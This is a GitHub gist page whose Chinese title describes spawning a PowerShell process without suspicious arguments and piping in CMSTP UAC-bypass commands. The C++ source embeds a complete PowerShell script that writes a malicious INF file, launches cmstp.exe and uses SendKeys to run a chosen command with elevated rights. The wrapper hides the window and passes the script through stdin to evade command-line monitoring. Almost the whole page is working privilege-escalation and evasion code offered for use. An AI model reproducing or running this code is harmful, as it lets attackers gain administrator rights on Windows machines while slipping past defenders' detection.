Skip to content

Instantly share code, notes, and snippets.

@aaaddress1
Created October 24, 2024 15:06
Show Gist options
  • Save aaaddress1/d877bc658c57f0f3bcd33d525a937ff4 to your computer and use it in GitHub Desktop.
Save aaaddress1/d877bc658c57f0f3bcd33d525a937ff4 to your computer and use it in GitHub Desktop.
創建無敏感參數 PowerShell 進程並自動化逐行輸入 CMSTP UAC 提權指令完成提權
#include <windows.h>
#include <iostream>
// CMSTP UAC Bypass PowerShell Version.
// ref: https://github.com/tylerapplebaum/CMSTP-UACBypass/blob/master/UACBypassCMSTP.ps1
auto cmstp_uacbypass_ps1 = "# UAC Bypass poc using SendKeys\n"
"# Version 1.0\n"
"# Author: Oddvar Moe\n"
"# Functions borrowed from: https://powershell.org/forums/topic/sendkeys/\n"
"# Todo: Hide window on screen for stealth\n"
"# Todo: Make script edit the INF file for command to inject...\n"
"\n"
"\n"
"Function script:Set-INFFile {\n"
"[CmdletBinding()]\n"
"\tParam (\n"
"\t[Parameter(HelpMessage=\"Specify the INF file location\")]\n"
"\t$InfFileLocation = \"$env:temp\\CMSTP.inf\",\n"
"\t\n"
"\t[Parameter(HelpMessage=\"Specify the command to launch in a UAC-privileged window\")]\n"
"\t[String]$CommandToExecute = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n"
"\t)\n"
"\n"
"$InfContent = @\"\n"
"[version]\n"
"Signature=`$chicago`$\n"
"AdvancedINF=2.5\n"
"\n"
"[DefaultInstall]\n"
"CustomDestination=CustInstDestSectionAllUsers\n"
"RunPreSetupCommands=RunPreSetupCommandsSection\n"
"\n"
"[RunPreSetupCommandsSection]\n"
"; Commands Here will be run Before Setup Begins to install\n"
"$CommandToExecute -NoExit echo 'hello from Evil Admin >:)'\n"
"taskkill /IM cmstp.exe /F\n"
"\n"
"[CustInstDestSectionAllUsers]\n"
"49000,49001=AllUSer_LDIDSection, 7\n"
"\n"
"[AllUSer_LDIDSection]\n"
"\"HKLM\", \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\CMMGR32.EXE\", \"ProfileInstallPath\", \"%UnexpectedError%\", \"\"\n"
"\n"
"[Strings]\n"
"ServiceName=\"CorpVPN\"\n"
"ShortSvcName=\"CorpVPN\"\n"
"\n"
"\"@\n"
"\n"
"$InfContent | Out-File $InfFileLocation -Encoding ASCII\n"
"}\n"
"\n"
"\n"
"Function Get-Hwnd\n"
"{\n"
" [CmdletBinding()]\n"
" \n"
" Param\n"
" (\n"
" [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [string] $ProcessName\n"
" )\n"
" Process\n"
" {\n"
" $ErrorActionPreference = 'Stop'\n"
" Try \n"
" {\n"
" $hwnd = Get-Process -Name $ProcessName | Select-Object -ExpandProperty MainWindowHandle\n"
" }\n"
" Catch \n"
" {\n"
" $hwnd = $null\n"
" }\n"
" $hash = @{\n"
" ProcessName = $ProcessName\n"
" Hwnd = $hwnd\n"
" }\n"
" \n"
" New-Object -TypeName PsObject -Property $hash\n"
" }\n"
"}\n"
"\n"
"function Set-WindowActive\n"
"{\n"
" [CmdletBinding()]\n"
"\n"
" Param\n"
" (\n"
" [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [string] $Name\n"
" )\n"
" \n"
" Process\n"
" {\n"
" $memberDefinition = @'\n"
" [DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);\n"
" [DllImport(\"user32.dll\", SetLastError = true)] public static extern bool SetForegroundWindow(IntPtr hWnd);\n"
"\n"
"'@\n"
"\n"
" Add-Type -MemberDefinition $memberDefinition -Name Api -Namespace User32\n"
" $hwnd = Get-Hwnd -ProcessName $Name | Select-Object -ExpandProperty Hwnd\n"
" If ($hwnd) \n"
" {\n"
" $onTop = New-Object -TypeName System.IntPtr -ArgumentList (0)\n"
" [User32.Api]::SetForegroundWindow($hwnd)\n"
" [User32.Api]::ShowWindow($hwnd, 5)\n"
" }\n"
" Else \n"
" {\n"
" [string] $hwnd = 'N/A'\n"
" }\n"
"\n"
" $hash = @{\n"
" Process = $Name\n"
" Hwnd = $hwnd\n"
" }\n"
" \n"
" New-Object -TypeName PsObject -Property $hash\n"
" }\n"
"}\n"
"\n"
". Set-INFFile\n"
"#Needs Windows forms\n"
"add-type -AssemblyName System.Windows.Forms\n"
"If (Test-Path $InfFileLocation) {\n"
"#Command to run\n"
"$ps = new-object system.diagnostics.processstartinfo \"c:\\windows\\system32\\cmstp.exe\"\n"
"$ps.Arguments = \"/au $InfFileLocation\"\n"
"$ps.UseShellExecute = $false\n"
"\n"
"#Start it\n"
"[system.diagnostics.process]::Start($ps)\n"
"\n"
"do\n"
"{\n"
"\t# Do nothing until cmstp is an active window\n"
"}\n"
"until ((Set-WindowActive cmstp).Hwnd -ne 0)\n"
"\n"
"\n"
"#Activate window\n"
"Set-WindowActive cmstp\n"
"\n"
"#Send the Enter key\n"
"[System.Windows.Forms.SendKeys]::SendWait(\"{ENTER}\")\n"
"}\n"
"[System.Windows.Forms.MessageBox]::Show('Hello from Low IL' , '3Ocm.tw')\n"
"\n";
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
// 定義Powershell命令
wchar_t powershellCmd[] = L"powershell.exe -NoExit";
// 定義變量
STARTUPINFOW si;
PROCESS_INFORMATION pi;
SECURITY_ATTRIBUTES sa;
HANDLE hStdInRead, hStdInWrite, hStdOutRead, hStdOutWrite;
memset(&si, 0, sizeof(si));
si.cb = sizeof(si);
memset(&pi, 0, sizeof(pi));
memset(&sa, 0, sizeof(sa));
sa.nLength = sizeof(sa);
sa.bInheritHandle = TRUE;
// 創建管道
CreatePipe(&hStdOutRead, &hStdOutWrite, &sa, 0);
SetHandleInformation(hStdOutRead, HANDLE_FLAG_INHERIT, 0);
CreatePipe(&hStdInRead, &hStdInWrite, &sa, 0);
SetHandleInformation(hStdInWrite, HANDLE_FLAG_INHERIT, 0);
// 配置STARTUPINFO
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdOutput = hStdOutWrite;
si.hStdError = hStdOutWrite;
si.hStdInput = hStdInRead;
// 創建Powershell進程
CreateProcessW(NULL, (LPWSTR)powershellCmd, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
// 關閉不必要的句柄
CloseHandle(hStdOutWrite);
CloseHandle(hStdInRead);
// 向Powershell進程輸入命令
const char* command = cmstp_uacbypass_ps1;
DWORD written;
WriteFile(hStdInWrite, command, strlen(command), &written, NULL);
// 讀取Powershell進程的輸出
CHAR buffer[4096];
DWORD read;
while (ReadFile(hStdOutRead, buffer, sizeof(buffer) - 1, &read, NULL) && read > 0) {
buffer[read] = '\0';
std::cout << buffer;
}
// 關閉句柄
CloseHandle(hStdInWrite);
CloseHandle(hStdOutRead);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return 0;
}
@aaaddress1
Copy link
Author

image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment